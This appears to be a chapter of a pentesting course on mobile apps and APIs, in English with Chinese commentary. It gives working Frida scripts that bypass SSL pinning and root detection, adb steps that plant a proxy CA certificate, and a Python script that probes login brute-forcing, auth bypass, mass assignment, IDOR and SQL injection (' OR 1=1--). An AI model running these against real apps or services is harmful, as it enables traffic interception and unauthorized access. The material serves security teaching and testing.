Mobile & API Pentesting
🔥 Vibe Prompt
"Pentest a mobile app: intercept traffic, bypass SSL, root detection, API testing."
Mobile Setup
# Android: Burp Suite proxy
# 1. Set Wi-Fi proxy to Burp (192.168.1.X:8080)
# 2. Install Burp CA cert
adb push burp-ca.der /sdcard/
adb shell "su -c 'cp /sdcard/burp-ca.der /system/etc/security/cacerts/9a5ba575.0'"
# iOS: Proxy with QProxy
# 1. Install QProxy from Cydia
# 2. Set proxy to Burp
# 3. Install Burp CA (Settings → Profile)
# Bypass SSL pinning (Android)
# Use Frida: frida -U -f com.target.app -l ssl_bypass.js
Frida SSL Bypass
// ssl_bypass.js
Java.perform(function() {
var ArrayList = Java.use('java.util.ArrayList');
var TrustManager = Java.use('javax.net.ssl.TrustManager');
var TrustAll = Java.registerClass({
name: 'com.example.TrustAll',
implements: [TrustManager],
methods: {
checkClientTrusted: function(chain, authType) {},
checkServerTrusted: function(chain, authType) {},
getAcceptedIssuers: function() { return []; }
}
});
var SSLContext = Java.use('javax.net.ssl.SSLContext');
SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(keyManagers, trustManagers, secureRandom) {
return this.init(keyManagers, [TrustAll.$new()], secureRandom);
};
console.log("SSL pinning bypassed!");
});
# Run: frida -U -f com.target.app -l ssl_bypass.js
Root Detection Bypass
// root_bypass.js
Java.perform(function() {
// Method 1: Hook root check
var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
RootBeer.isRooted.implementation = function() { return false; };
// Method 2: Hide from detection
var Process = Java.use('java.lang.Process');
var File = Java.use('java.io.File');
File.exists.implementation = function() {
var path = this.getPath();
if (path.includes("su") || path.includes("magisk")) {
return false;
}
return this.exists();
};
console.log("Root detection bypassed!");
});
API Security Testing
import requests
BASE = "https://api.target.com/v1"
def test_api():
findings = []
# 1. Rate limiting
for i in range(100):
r = requests.post(f"{BASE}/login", json={"user": "admin", "pass": "wrong"})
if r.status_code != 429 and i > 10:
findings.append("No rate limiting on login!")
break
# 2. Auth bypass
r = requests.get(f"{BASE}/admin/users", headers={"Authorization": "Bearer invalid"})
if r.status_code == 200:
findings.append("Auth bypass!")
# 3. Mass assignment
r = requests.put(f"{BASE}/user/profile", json={"name": "test", "role": "admin"})
if r.status_code == 200:
findings.append("Mass assignment: role updated!")
# 4. IDOR
r1 = requests.get(f"{BASE}/orders/1", headers={"Authorization": f"Bearer {token}"})
r2 = requests.get(f"{BASE}/orders/2", headers={"Authorization": f"Bearer {token}"})
if r1.json().get("user_id") != r2.json().get("user_id") and r2.status_code == 200:
findings.append("IDOR: can access other orders!")
# 5. Injection
r = requests.get(f"{BASE}/search?q=' OR 1=1--")
if r.status_code == 200 and len(r.json()) > 0:
findings.append("SQL injection in search!")
return findings
for f in test_api():
print(f"⚠️ {f}")
Mobile Pentesting Checklist
| Check | Android | iOS | |-------|---------|-----| | Traffic interception | Burp proxy + CA cert | QProxy + CA cert | | SSL pinning bypass | Frida | Frida / SSL Kill Switch 2 | | Root/jailbreak detect | RootBeer hook | AntiSubstrateCrack | | Insecure storage | SharedPrefs, SQLite | Keychain, Plist | | Hardcoded secrets | APK decompile | IPA decompile | | App clipping | Intent sniffing | URL scheme hijack | | Emulator detection | Build fingerprint | Model check |
Tools
| Tool | Purpose | |------|---------| | Frida | Runtime manipulation | | Objection | Mobile exploration | | APKTool | APK decompile | | MobSF | Static/dynamic analysis | | Drozer | Android security audit | | Radare2 | Binary analysis | | Hopper | iOS disassembler |
Best Practices
- Always test on real device (emulator detection common)
- Use Frida for runtime bypasses
- Decompile APK/IPA for hardcoded secrets
- Test both API and mobile app together
- Check for insecure data storage
- Verify rate limiting on all endpoints
- Test app clipping / intent hijacking
行動裝置安全:被忽略的攻擊面
很多開發者只注重 Web 安全,卻忽略了行動裝置 App 是更大的攻擊面——App 安裝在使用者的手機上,攻擊者可以反編譯、攔截流量、分析本地儲存。
行動裝置滲透測試的重點
| 測試項目 | 檢查什麼 | 常見漏洞 | |:--------|:--------|:--------| | 本地儲存 | SharedPreferences、SQLite | 明文化保存 API Key 或 Token | | SSL Pinning | HTTPS 憑證綁定 | 沒有 Pinning 可被中間人攻擊 | | 反編譯 | ProGuard/DexGuard 混淆 | 未混淆可輕易讀取商業邏輯 | | Deep Link | URL Scheme 處理 | 可以被其他 App 惡意觸發 | | WebView | JavaScript Bridge | XSS 導致本地命令執行 |
API 滲透測試的重點
| 測試項目 | 常見漏洞 | |:--------|:--------| | 身份驗證繞過 | JWT 未驗證簽章、Token 可重放 | | Rate Limit | 沒有頻率限制,可暴力破解 | | GraphQL Injection | 深度查詢導致 DoS | | IDOR | 修改 ID 就能存取別人的資料 |
下一章預告:滲透測試報告
這是最後一章實戰。你學會了如何發現漏洞,接下來要學的是如何撰寫專業的滲透測試報告——把技術發現轉換成客戶和開發團隊能理解的語言。